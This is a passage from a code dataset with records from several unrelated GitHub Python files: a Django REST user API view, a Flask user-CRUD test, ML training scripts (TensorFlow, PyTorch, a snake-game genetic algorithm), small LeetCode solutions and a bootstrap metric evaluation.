###REQUIRES AUTH\n ---\n serializer: ShoutSerializer\n parameters:\n - name: username\n description: me for logged in user\n paramType: path\n required: true\n defaultValue: me\n - name: page\n paramType: query\n - name: page_size\n paramType: query\n \"\"\"\n setattr(self, 'get_queryset', ShoutViewSet().get_queryset)\n shouts = HomeFilterBackend().filter_queryset(request=request, index_queryset=ShoutIndex.search(), view=self)\n paginator = PageNumberIndexPagination()\n page = paginator.paginate_queryset(index_queryset=shouts, request=request, view=self)\n serializer = ShoutSerializer(page, many=True, context={'request': request})\n return paginator.get_paginated_response(serializer.data)\n\n @detail_route(methods=['get'], suffix='Shouts')\n def shouts(self, request, *args, **kwargs):\n \"\"\"\n List the User shouts.\n [Shouts Pagination](https://docs.google.com/document/d/1Zp9Ks3OwBQbgaDRqaULfMDHB-eg9as6_wHyvrAWa8u0/edit#heading=h.97r3lxfv95pj)\n ---\n serializer: ShoutSerializer\n omit_parameters:\n - form\n parameters:\n - name: username\n description: me for logged in user\n paramType: path\n required: true\n defaultValue: me\n - name: shout_type\n paramType: query\n defaultValue: all\n enum:\n - request\n - offer\n - all\n - name: page_size\n paramType: query\n \"\"\"\n user = self.get_object()\n shout_type = request.query_params.get('shout_type', 'all')\n if shout_type not in ['offer', 'request', 'all']:\n raise ValidationError({'shout_type': \"should be `offer`, `request` or `all`\"})\n\n self.pagination_class = PageNumberIndexPagination\n setattr(self, 'get_queryset', ShoutViewSet().get_queryset)\n shouts = ShoutIndex.search().filter('term', uid=user.pk).sort('-published_at')\n if shout_type != 'all':\n shouts = shouts.query('match', type=shout_type)\n\n page = self.paginate_queryset(shouts)\n serializer = ShoutSerializer(page, many=True, context={'request': request})\n return self.get_paginated_response(serializer.data)\n\n @detail_route(methods=['post'], suffix='Message')\n def message(self, request, *args, **kwargs):\n \"\"\"\n Send the User a message\n ###REQUIRES AUTH\n > A user can only message his Listeners, or someone whom he already has an existing conversation with.\n ###Request\n
\n        {\n            \"text\": \"text goes here\",\n            \"attachments\": [\n                {\n                    \"shout\": {\n                        \"id\": \"\"\n                    }\n                },\n                {\n                    \"location\": {\n                        \"latitude\": 12.345,\n                        \"longitude\": 12.345\n                    }\n                },\n                {\n                    \"images\": [], // list of image urls\n                    \"videos\": [] // list of {Video Object}s\n                }\n            ]\n        }\n        
\n ---\n response_serializer: MessageSerializer\n omit_parameters:\n - form\n parameters:\n - name: body\n paramType: body\n \"\"\"\n user = self.get_object()\n logged_user = request.user\n if logged_user == user:\n raise ValidationError({'error': \"You can not start a conversation with your self\"})\n if not (message_controller.conversation_exist(users=[user, logged_user]) or user.is_listening(logged_user)):\n raise ValidationError({'error': \"You can only start a conversation with your listeners\"})\n context = {\n 'request': request,\n 'conversation': None,\n 'to_users': [user]\n }\n serializer = MessageSerializer(data=request.data, partial=False, context=context)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n headers = self.get_success_message_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n def get_success_message_headers(self, data):\n loc = reverse('conversation-messages', kwargs={'id': data['conversation_id']}, request=self.request)\n return {'Location': loc}\n\n @detail_route(methods=['post', 'patch', 'delete'], suffix='Link / Unlink Accounts')\n def link(self, request, *args, **kwargs):\n \"\"\"\n Link/Unlink external social accounts\n ###REQUIRES AUTH\n\n ###Link Facebook\n
\n        PATCH: /v2/users/{username}/link\n        {\n            \"account\": \"facebook\",\n            \"facebook_access_token\": \"FACEBOOK_ACCESS_TOKEN\"\n        }\n        
\n\n ###Unlink Facebook\n
\n        DELETE: /v2/users/{username}/link\n        {\n            \"account\": \"facebook\"\n        }\n        
\n\n ###Link G+\n
\n        PATCH: /v2/users/{username}/link\n        {\n            \"account\": \"gplus\",\n            \"gplus_code\": \"GOOGLE_GRANT_CODE\"\n        }\n        
\n\n ###Unlink G+\n
\n        DELETE: /v2/users/{username}/link\n        {\n            \"account\": \"gplus\"\n        }\n        
\n ---\n serializer: UserDetailSerializer\n omit_parameters:\n - form\n parameters:\n - name: body\n paramType: body\n \"\"\"\n user = self.get_object()\n account = request.data.get('account') or request.query_params.get('account')\n if not account:\n raise ValidationError({'account': \"This field is required\"})\n if account not in ['facebook', 'gplus']:\n raise ValidationError({'account': \"Unsupported social account\"})\n\n if request.method in ['PATCH', 'POST']:\n if account == 'gplus':\n gplus_code = request.data.get('gplus_code')\n if not gplus_code:\n raise ValidationError({'gplus_code': \"provide a valid `gplus_code`\"})\n client = hasattr(request.auth, 'client') and request.auth.client.name or None\n gplus_controller.link_gplus_account(user, gplus_code, client)\n\n elif account == 'facebook':\n facebook_access_token = request.data.get('facebook_access_token')\n if not facebook_access_token:\n raise ValidationError({'facebook_access_token': \"provide a valid `facebook_access_token`\"})\n facebook_controller.link_facebook_account(user, facebook_access_token)\n\n else:\n if account == 'gplus':\n gplus_controller.unlink_gplus_user(user)\n\n elif account == 'facebook':\n facebook_controller.unlink_facebook_user(user)\n\n serializer = self.get_serializer(user)\n return Response(serializer.data)\n\n @detail_route(methods=['post'], permission_classes=(IsAuthenticated, IsOwner), suffix=\"Deactivate user's account\")\n def deactivate(self, request, *args, **kwargs):\n \"\"\"\n Deactivate user's account\n ###REQUIRES AUTH, Account owner\n\n ####Body\n
\n        {\n            \"password\": \"current password\"\n        }\n        
\n ---\n omit_serializer: true\n omit_parameters:\n - form\n \"\"\"\n user = self.get_object()\n serializer = UserDeactivationSerializer(data=request.data, context={'user': user})\n serializer.is_valid(raise_exception=True)\n return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"shoutit/shoutit-api","sub_path":"src/shoutit/api/v2/views/user_views.py","file_name":"user_views.py","file_ext":"py","file_size_in_byte":19617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"31325826743","text":"from flask import json\nfrom app import app, db, User\nimport unittest \n\n#unittest.TestCase is a class\nclass TestUsers(unittest.TestCase):\n def setUp(self):\n app.config['TESTING'] = True\n app.config['SQLALCHEMY_DATABASE_URI'] = '...'\n self.app = app.test_client()\n self.context = app.app_context()\n self.context.push()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n for user in User.query.all():\n db.session.delete(user)\n db.session.commit()\n db.drop_all()\n self.context.pop()\n #creates record in the database\n def test_create_user(self):\n # Send a POST request to create a user\n response = self.app.post('/users', data=json.dumps({'name': 'John', 'email': 'john@example.com'}), content_type='application/json')\n self.assertEqual(response.status_code, 201)\n self.assertEqual(User.query.count(), 1) #problem\n #first creates a user before executing a put request\n def test_update_user(self):\n # Create a user\n user = User(name='John', email='john@example.com')\n db.session.add(user)\n db.session.commit()\n\n # Send a PUT request to update the user\n response = self.app.put(f'/users/{user.id}', data=json.dumps({'name': 'Jane'}), content_type='application/json')\n self.assertEqual(response.status_code, 200)\n\n # Check that the user was updated\n updated_user = User.query.get(user.id)\n self.assertEqual(updated_user.name, 'Jane')\n\n def test_delete_user(self):\n # Create a user\n user = User(name='John', email='john@example.com')\n db.session.add(user)\n db.session.commit()\n\n # Send a GET request to get the user's ID\n response = self.app.get(f'/users/{user.id}')\n self.assertEqual(response.status_code, 200) #problem\n\n # Send a DELETE request to delete the user\n response = self.app.delete(f'/users/{user.id}')\n self.assertEqual(response.status_code, 200)\n\n # Check that the user was deleted\n deleted_user = User.query.get(user.id)\n self.assertIsNone(deleted_user)\n\nif __name__ == '__main__':\n unittest.main()\n \n#To execute the unitest, run = python -m unittest discover -s tests - in the VSCode terminal\n#documentation here: https://docs.python.org/3/library/unittest.html\n","repo_name":"owenwu811/Flask-PostGreSQL","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19347181344","text":"import os\n\nimport tensorflow as tf\n\nimport config as config\nfrom dali_dataset import get_dali_dataset\n\n\ndef get_dataset() -> tf.data.Dataset:\n \"\"\"\n Create test Tensorflow dataset.\n\n :return: Tensorflow dataset\n \"\"\"\n video_names = [\n '01.mp4',\n '02.mp4',\n '03.mp4',\n '04.mp4',\n '05.mp4',\n '06.mp4',\n '07.mp4',\n '08.mp4',\n '09.mp4',\n '10.mp4']\n labels = [1, 1, 1, 1, 1, 0, 0, 0, 0, 0]\n video_paths = []\n for video_name in video_names:\n video_paths.append(os.path.join(config.BASE_DIR, 'dali_test_sample', video_name))\n\n dataset = get_dali_dataset(video_paths, labels)\n dataset = dataset.batch(1)\n return dataset\n\n\nif __name__ == '__main__':\n xception = tf.keras.applications.xception.Xception(\n include_top=False, weights='imagenet',\n input_shape=(config.IMG_SIZE, config.IMG_SIZE, 3),\n pooling='max')\n xception_out = xception.get_layer('global_max_pooling2d').output\n\n out = tf.keras.layers.Dense(1, activation='sigmoid')(xception_out)\n model = tf.keras.models.Model(xception.input, out)\n model.compile(optimizer='adam', loss='binary_crossentropy')\n\n train_dataset = get_dataset()\n\n model.fit(\n x=train_dataset,\n epochs=config.EPOCHS\n )\n","repo_name":"sashulyak/kgl_deepfake","sub_path":"src/dali_train.py","file_name":"dali_train.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28777570756","text":"import os\nimport random\n\nimport numpy as np\nimport torch\n\nfrom gameTrainer import Direction, GameTrainer\nfrom helper import plot\nfrom model import LinearQNet, DEVICE\n\nPOPULATION_SIZE = 100\nMUTATION_RATE = 0.5\nCROSSOVER_RATE = 0.2\nGENERATION_SIZE = 1000\n\n\nclass Agent:\n\n def __init__(self, model):\n self.model = model\n\n @staticmethod\n def get_state(game):\n state = [\n # Wall location\n game.collision(0, 'wall'),\n game.collision(1, 'wall'),\n game.collision(2, 'wall'),\n game.collision(3, 'wall'),\n game.collision(4, 'wall'),\n game.collision(5, 'wall'),\n game.collision(6, 'wall'),\n game.collision(7, 'wall'),\n\n # Snake location\n game.collision(2, 'snake'),\n game.collision(3, 'snake'),\n game.collision(0, 'snake'),\n game.collision(1, 'snake'),\n game.collision(6, 'snake'),\n game.collision(7, 'snake'),\n game.collision(4, 'snake'),\n game.collision(5, 'snake'),\n\n # Food location\n game.collision(2, 'food'),\n game.collision(3, 'food'),\n game.collision(0, 'food'),\n game.collision(1, 'food'),\n game.collision(6, 'food'),\n game.collision(7, 'food'),\n game.collision(4, 'food'),\n game.collision(5, 'food'),\n\n game.snake.direction == Direction.RIGHT,\n game.snake.direction == Direction.UP,\n game.snake.direction == Direction.LEFT,\n game.snake.direction == Direction.DOWN\n ]\n\n return np.array(state, dtype=float)\n\n def get_action(self, state):\n final_move = [0, 0, 0, 0]\n state0 = torch.tensor(state, dtype=torch.float, device=DEVICE)\n prediction = self.model(state0)\n move = torch.argmax(prediction).item()\n final_move[move] = 1\n\n return final_move\n\n\ndef evaluate(score, steps):\n return score + 0.5 + (0.5 * (score - steps / (score + 1)) / (score + steps / (score + 1)))\n\n\ndef snake_ai(model):\n game = GameTrainer()\n agent = Agent(model)\n while True:\n # get old state\n state_old = agent.get_state(game)\n\n # get move\n final_move = agent.get_action(state_old)\n\n # perform move and get new state\n reward, done, score, steps = game.step_by_pygame(final_move)\n\n if done:\n fitness = evaluate(score, steps)\n\n print('Score:', score, 'Steps:', steps, 'Fitness:', fitness)\n\n return fitness\n\n\ndef select_parents(population, fitness):\n population_size = int(len(population) * CROSSOVER_RATE)\n population_fitness = list(zip(population, fitness))\n population_fitness.sort(key=lambda x: x[1], reverse=True)\n population_fitness = [x for x in population_fitness if x[1] != 0]\n if population_fitness is None or len(population_fitness) < 2:\n return [LinearQNet(28, 8, 4) for _ in range(POPULATION_SIZE)]\n population, fitness = zip(*population_fitness)\n if len(population) > population_size:\n elite = list(population)[:population_size]\n else:\n elite = list(population)[:len(population)]\n return elite\n\n\ndef crossover(parent1, parent2):\n # Create a new model with the same architecture as parent1\n child = LinearQNet(28, 8, 4)\n child.load_state_dict(parent1.state_dict())\n # Select a crossover point\n crossover_point = random.randint(1, len(parent1.state_dict()))\n # Copy the parameters from parent2 to child\n for i, (name, param) in enumerate(parent2.state_dict().items()):\n if i >= crossover_point:\n child.state_dict()[name].copy_(param)\n return child\n\n\ndef mutation(child):\n for param in child.parameters():\n if random.random() < MUTATION_RATE:\n noise = torch.randn_like(param) * 0.1\n param.data += noise\n return child\n\n\ndef crossover_and_mutation(parents):\n children = parents.copy()\n for _ in range(POPULATION_SIZE - len(parents)):\n parent1 = parents[random.randint(0, len(parents) - 1)]\n parent2 = parents[random.randint(0, len(parents) - 1)]\n child_crossover = crossover(parent1, parent2)\n child_mutation = mutation(child_crossover)\n children.append(child_mutation)\n for idx in range(len(children)):\n children[idx].save(file_name=f'model{idx + 1}.pth')\n return children\n\n\ndef train():\n scores = []\n mean_scores = []\n generations = 0\n\n model_folder_path = './model'\n population = []\n if os.path.exists(model_folder_path):\n for i in os.listdir(model_folder_path):\n model = LinearQNet(28, 8, 4)\n model.load_state_dict(torch.load(os.path.join(model_folder_path, i)))\n population.append(model)\n else:\n population = [LinearQNet(28, 8, 4) for _ in range(POPULATION_SIZE)]\n\n while GENERATION_SIZE > generations:\n # Evaluate the fitness of each individual\n fitness = [snake_ai(model) for model in population]\n\n # Select the individuals for crossover\n parents = select_parents(population, fitness)\n\n # Crossover and mutation\n population = crossover_and_mutation(parents)\n\n fitness.sort(reverse=True)\n scores.append(np.floor(fitness[0]))\n mean_scores.append(sum(scores) / len(scores))\n\n plot(scores, mean_scores)\n print(f'Generation: {generations} Top_Score: {np.floor(fitness[0])}')\n generations += 1\n\n","repo_name":"0oWoodenDooro0/SnakeAI","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":5521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20402850253","text":"from .config import *\n\n\ndef lstm_layer(x, batch_size, name):\n with tf.name_scope(name) as scope:\n lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(lstm_hidden, reuse=False)\n init = lstm_cell.zero_state(batch_size, tf.float32)\n x, state = tf.nn.dynamic_rnn(lstm_cell, inputs=x, initial_state=init, scope=scope)\n return x\n\n\ndef seq2seq(x, batch_size):\n x = lstm_layer(x, batch_size, 'lstm1')\n x = lstm_layer(x, batch_size, 'lstm2')\n return x\n\n\n","repo_name":"codybai/mycode","sub_path":"tensorflow/2018_6_10/tensorflow_wanzheng/finalmodel/Attention.py","file_name":"Attention.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23081391000","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\nloss = nn.CrossEntropyLoss()\n\nY = torch.tensor([2, 0, 1])\n# nsamples x nclasses = 1x3\nY_pred_good = torch.tensor([[0.1, 1.0, 2.1],[2.0, 1.0, 0.1],[0.1, 3.0, 0.1]])\nY_pred_bad = torch.tensor([[0.5, 2.0, 0.3],[0.1, 1.0, 2.1],[0.1, 3.0, 0.1]])\n\nl1 = loss(Y_pred_good,Y)\nl2 = loss(Y_pred_bad,Y)\nprint(l1.item(), l2.item())\n\n_, predictions1 = torch.max(Y_pred_good, 1)\n_, predictions2 = torch.max(Y_pred_bad, 1)\n\nprint(predictions1,predictions2)\n\n\n\n# # softmax: e^x/SUM_i e^(x_i)\n# def softmax(x):\n# return np.exp(x)/np.sum(np.exp(x), axis=0)\n\n# x = np.array([2.0, 1.0, 0.1])\n# outputs = softmax(x)\n# print('softmax numpy:', outputs)\n\n# x = torch.tensor([2.0, 1.0, 0.1])\n# outputs = torch.softmax(x, dim=0)\n# print('tensor:', outputs)\n\n# def cross_entropy(actual, predicted):\n# loss = -np.sum(actual * np.log(predicted))\n# return loss\n\n# Y = np.array([1,0,0])\n\n# Y_pred_good = np.array([0.7, 0.2, 0.1])\n# Y_pred_bad = np.array([0.1, 0.3, 0.6])\n# l1 = cross_entropy(Y, Y_pred_bad)\n# l2 = cross_entropy(Y, Y_pred_good)\n\n# print(l1, l2)","repo_name":"aijphy/practice-spring-2022","sub_path":"pytorchTutorial/softmax_crossentropy.py","file_name":"softmax_crossentropy.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21619825230","text":"class Solution:\n def majorityElement(self, nums: list[int]) -> list[int]:\n minimum = len(nums) // 3\n counts = {}; majority = []\n for num in nums:\n if num in majority:\n continue\n\n if num not in counts.keys():\n counts[num] = 0\n counts[num] += 1\n\n if counts[num] > minimum:\n majority.append(num)\n\n return majority\n","repo_name":"MatejHosek/leetcode","sub_path":"solutions/229-Majority_Element_II.py","file_name":"229-Majority_Element_II.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34866232429","text":"import time\nimport numpy\nimport pandas\nimport scipy\nimport sklearn\nfrom sklearn import metrics\nimport os\nimport multiprocessing\n\nthis_py_file = os.path.dirname(os.path.realpath(__file__))\n\n\ndata = pandas.read_csv(this_py_file+'/evaluation/MFTE_Python_Eval_Results_filtered.csv', keep_default_na=False)\n\nprint(data)\n\nprint(data.dtypes)\n\ndata['TagGold'].value_counts()\n\nmin_n = 100\n#exclude_tags = ['NONE', 'UNCLEAR', 'none', 'unclear']\n\ndata['Count'] = data.groupby('TagGold')['TagGold'].transform(len)\nenough_data = data['Count'] >= min_n\n#valid_tag_gold = ~data['TagGold'].isin(exclude_tags)\n#valid_tag = ~data['Tag'].isin(exclude_tags)\n#data_filtered = data[enough_data & valid_tag_gold & valid_tag]\ndata_filtered = data[enough_data]\n\ndata_filtered['TagGold'].value_counts()\n\ntags_remaining = set.union(set(data_filtered['TagGold']), set(data_filtered['Tag']))\n\ndata_filtered['TagGold'] = pandas.Categorical(data_filtered['TagGold'], categories=tags_remaining)\ndata_filtered['Tag'] = pandas.Categorical(data_filtered['Tag'], categories=tags_remaining)\n\ntags = data_filtered['TagGold'].unique()\n\nprecision, recall, f1, n = metrics.precision_recall_fscore_support(\n data['TagGold'],\n data['Tag'],\n labels=tags\n)\n\nresults = pandas.DataFrame({\n 'tag': tags,\n 'precision': precision,\n 'recall': recall,\n 'f1': f1,\n 'n': n\n})\n\nresults\n\nresults = results.melt(id_vars=['tag', 'n'], var_name='metric')\n# results['lower'] = numpy.nan\n# results['upper'] = numpy.nan\n# results['valid'] = False\n\nresults\n\nn_resamples = 1000\n\ndata_bootstrap = data[data['TagGold'].isin(tags) | data['Tag'].isin(tags)]\n\n\ndef get_bootstrap_done (row: dict) -> dict:\n print(row['tag'], row['metric'], '... ', end='')\n start_time = time.time()\n temp = dict()\n if row['value'] == 1.0:\n print('skipping')\n temp['lower'] = numpy.nan\n temp['upper'] = numpy.nan\n temp['valid'] = False\n temp['tag'] = row['tag']\n temp['n'] = row['n']\n else: \n if row['metric'] == 'precision':\n func = sklearn.metrics.precision_score\n elif row['metric'] == 'recall':\n func = sklearn.metrics.recall_score\n else:\n func = sklearn.metrics.f1_score\n \n def metric(y_true, y_pred):\n return func(y_true, y_pred, labels=[row['tag']], average=None)[0]\n\n boot = scipy.stats.bootstrap(\n (data_bootstrap['TagGold'], data_bootstrap['Tag']),\n metric,\n vectorized=False,\n paired=True,\n n_resamples=n_resamples,\n method='percentile',\n random_state=0\n )\n print('done', int(time.time() - start_time), 's')\n \n temp['lower'] = boot.confidence_interval.low\n temp['upper'] = boot.confidence_interval.high\n temp['valid'] = True\n temp['tag'] = row['tag']\n temp['metric'] = row['metric']\n temp['n'] = row['n']\n return temp\n\nresult_dict = results.T.to_dict().values()\n\nif __name__ == \"__main__\":\n cpu_count = int(multiprocessing.cpu_count() / 2) #run half cpus\n with multiprocessing.Pool(cpu_count) as pool:\n result1 = pool.map(get_bootstrap_done, result_dict)\n result1 = pandas.DataFrame(result1)\n result1.to_csv(this_py_file+'/evaluation/Temp_CIs.csv', index=False)\n results = results.merge(result1, on=['tag', 'metric', 'n'], how='left')\n results.to_csv(this_py_file+'/evaluation/MFTE_Python_Eval_CIs.csv', index=False)\n\n\n\n# for rownum, row in results.iterrows():\n \n# print(rownum, ':', row['tag'], row['metric'], '... ', end='')\n# start_time = time.time()\n \n# if row['value'] == 1.0:\n# print('skipping')\n# continue\n \n# if row['metric'] == 'precision':\n# func = sklearn.metrics.precision_score\n# elif row['metric'] == 'recall':\n# func = sklearn.metrics.recall_score\n# else:\n# func = sklearn.metrics.f1_score\n \n# def metric(y_true, y_pred):\n# return func(y_true, y_pred, labels=[row['tag']], average=None)[0]\n\n# boot = scipy.stats.bootstrap(\n# (data_bootstrap['TagGold'], data_bootstrap['Tag']),\n# metric,\n# vectorized=False,\n# paired=True,\n# n_resamples=n_resamples,\n# method='percentile',\n# random_state=0\n# )\n \n# print('done', int(time.time() - start_time), 's')\n \n# results.loc[rownum, 'lower'] = boot.confidence_interval.low\n# results.loc[rownum, 'upper'] = boot.confidence_interval.high\n# results.loc[rownum, 'valid'] = True\n \n","repo_name":"mshakirDr/MFTE","sub_path":"bootstrap_eval.py","file_name":"bootstrap_eval.py","file_ext":"py","file_size_in_byte":4512,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"75"} +{"seq_id":"4575073243","text":"from typing import List\n\n\nclass Solution:\n def evenOddBit(self, n: int) -> List[int]:\n ans = [0, 0]\n cur = 0\n while n:\n if (n & 1) == 1:\n ans[cur] += 1\n n >>= 1\n cur = (cur + 1) % 2\n return ans","repo_name":"ArslanTu/algorithm","sub_path":"leetcode/6319. 奇偶位数.py","file_name":"6319. 奇偶位���.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71002419124","text":"# Dependencies\nfrom bs4 import BeautifulSoup\nfrom splinter import Browser\nimport requests\nimport pandas as pd\n\ndef scrape(info,url):\n dg = []\n executable_path = {'executable_path': 'chromedriver.exe'}\n browser = Browser('chrome', **executable_path, headless=False)\n browser.visit(url)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n if info == \"News\":\n news = soup.find_all('ul', class_='item_list')\n for new in news:\n dic = {}\n dic['title'] = new.find('div', class_='content_title').text\n dic['p'] = new.find('a').text\n dg.append(dic)\n elif info == \"Images\":\n featured_mars_image = soup.find_all('div', class_='img')\n for i in range(len(featured_mars_image)):\n dic = {}\n dic['img'] = featured_mars_image[i].img[\"src\"]\n dg.append(dic)\n elif info == 'Weather':\n response = requests.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n dic = {}\n dic['wea']= soup.find('p', class_ = \"TweetTextSize TweetTextSize--normal js-tweet-text tweet-text\").text.strip()\n dg.append(dic)\n elif info == 'Facts':\n mars_tables = pd.read_html(url)\n mars_tables_df = mars_tables[0]\n mars_tables_df.columns = ['Description', 'Value']\n dg = mars_tables_df\n elif info == 'Hemis':\n hemisphere_list=['Cerberus','Schiaparelli','Syrtis','Valles']\n for hemi in hemisphere_list:\n dic = {}\n browser.visit(url)\n browser.click_link_by_partial_text(hemi)\n html = browser.html\n soup = BeautifulSoup(html,'html.parser')\n dic['image'] = soup.find('a',target=\"_blank\")['href']\n dic['title'] = soup.find('h2',class_=\"title\").text\n dg.append(dic)\n browser.quit()\n return dg\n\n\n\n\n \n\n\n\n","repo_name":"Ximepss2/web-scraping-challenge","sub_path":"FlaskMisiontoMars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72891272882","text":"from attention import DisentangledSelfAttention\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport copy\n\n\nclass CustomTransformerEncoderLayer(nn.Module):\n r\"\"\"TransformerEncoderLayer is made up of self-attn and feedforward network.\n This standard encoder layer is based on the paper \"Attention Is All You Need\".\n Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,\n Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in\n Neural Information Processing Systems, pages 6000-6010. Users may modify or implement\n in a different way during application.\n\n Args:\n d_model: the number of expected features in the input (required).\n nhead: the number of heads in the multiheadattention models (required).\n dim_feedforward: the dimension of the feedforward network model (default=2048).\n dropout: the dropout value (default=0.1).\n activation: the activation function of intermediate layer, relu or gelu (default=relu).\n\n Examples::\n >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)\n >>> src = torch.rand(10, 32, 512)\n >>> out = encoder_layer(src)\n \"\"\"\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"):\n super(CustomTransformerEncoderLayer, self).__init__()\n self.self_attn = DisentangledSelfAttention(d_model, nhead, dropout=dropout)\n # Implementation of Feedforward model\n self.linear1 = nn.Linear(d_model * (nhead + 1), dim_feedforward)\n self.dropout = nn.Dropout(dropout)\n self.linear2 = nn.Linear(dim_feedforward, d_model)\n\n self.norm1 = nn.LayerNorm(d_model * (nhead + 1))\n self.norm2 = nn.LayerNorm(d_model)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n\n self.activation = F.relu\n\n def forward(self, src, pos_encoding, rel_pos):\n r\"\"\"Pass the input through the encoder layer.\n\n Args:\n src: the sequence to the encoder layer (required).\n\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n src2 = self.self_attn(src, pos_encoding, rel_pos)\n # FIXME: Maybe sum instead of cat?\n src = torch.cat((src, self.dropout1(src2)), -1)\n\n src = self.norm1(src)\n src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))\n # FIXME: Add back skip connection\n #src = src + self.dropout2(src2)\n src = self.dropout2(src2)\n src = self.norm2(src)\n return src\n\n\ndef _get_clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\n\nclass CustomTransformerEncoder(nn.Module):\n r\"\"\"TransformerEncoder is a stack of N encoder layers\n\n Args:\n encoder_layer: an instance of the TransformerEncoderLayer() class (required).\n num_layers: the number of sub-encoder-layers in the encoder (required).\n norm: the layer normalization component (optional).\n\n Examples::\n >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)\n >>> transformer_encoder = nn.TransformerEncoder(encoder_layer, num_layers=6)\n >>> src = torch.rand(10, 32, 512)\n >>> out = transformer_encoder(src)\n \"\"\"\n __constants__ = ['norm']\n\n def __init__(self, encoder_layer, num_layers, norm=None):\n super(CustomTransformerEncoder, self).__init__()\n self.layers = _get_clones(encoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n\n def forward(self, src, pos_encoding, rel_pos):\n r\"\"\"Pass the input through the encoder layers in turn.\n\n Args:\n src: the sequence to the encoder (required).\n mask: the mask for the src sequence (optional).\n src_key_padding_mask: the mask for the src keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n output = src\n\n for mod in self.layers:\n output = mod(output, pos_encoding, rel_pos)\n\n if self.norm is not None:\n output = self.norm(output)\n\n return output\n\n\nclass CustomTransformer(nn.Module):\n r\"\"\"A transformer model. User is able to modify the attributes as needed. The architecture\n is based on the paper \"Attention Is All You Need\". Ashish Vaswani, Noam Shazeer,\n Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez, Lukasz Kaiser, and\n Illia Polosukhin. 2017. Attention is all you need. In Advances in Neural Information\n Processing Systems, pages 6000-6010. Users can build the BERT(https://arxiv.org/abs/1810.04805)\n model with corresponding parameters.\n\n Args:\n d_model: the number of expected features in the encoder/decoder inputs (default=512).\n nhead: the number of heads in the multiheadattention models (default=8).\n num_encoder_layers: the number of sub-encoder-layers in the encoder (default=6).\n num_decoder_layers: the number of sub-decoder-layers in the decoder (default=6).\n dim_feedforward: the dimension of the feedforward network model (default=2048).\n dropout: the dropout value (default=0.1).\n activation: the activation function of encoder/decoder intermediate layer, relu or gelu (default=relu).\n custom_encoder: custom encoder (default=None).\n custom_decoder: custom decoder (default=None).\n\n Examples::\n >>> transformer_model = nn.Transformer(nhead=16, num_encoder_layers=12)\n >>> src = torch.rand((10, 32, 512))\n >>> tgt = torch.rand((20, 32, 512))\n >>> out = transformer_model(src, tgt)\n\n Note: A full example to apply nn.Transformer module for the word language model is available in\n https://github.com/pytorch/examples/tree/master/word_language_model\n \"\"\"\n\n def __init__(self, d_model: int = 512, nhead: int = 8, num_encoder_layers: int = 6,\n dim_feedforward: int = 2048, dropout: float = 0.1,\n activation: str = \"relu\") -> None:\n super(CustomTransformer, self).__init__()\n\n encoder_layer = CustomTransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout, activation)\n encoder_norm = nn.LayerNorm(d_model)\n self.encoder = CustomTransformerEncoder(encoder_layer, num_encoder_layers, encoder_norm)\n\n self._reset_parameters()\n\n self.d_model = d_model\n self.nhead = nhead\n\n def forward(self, src, pos_encoding, rel_pos):\n r\"\"\"Take in and process masked source/target sequences.\n\n Args:\n src: the sequence to the encoder (required).\n tgt: the sequence to the decoder (required).\n src_mask: the additive mask for the src sequence (optional).\n tgt_mask: the additive mask for the tgt sequence (optional).\n memory_mask: the additive mask for the encoder output (optional).\n src_key_padding_mask: the ByteTensor mask for src keys per batch (optional).\n tgt_key_padding_mask: the ByteTensor mask for tgt keys per batch (optional).\n memory_key_padding_mask: the ByteTensor mask for memory keys per batch (optional).\n\n Shape:\n - src: :math:`(S, N, E)`.\n - tgt: :math:`(T, N, E)`.\n - src_mask: :math:`(S, S)`.\n - tgt_mask: :math:`(T, T)`.\n - memory_mask: :math:`(T, S)`.\n - src_key_padding_mask: :math:`(N, S)`.\n - 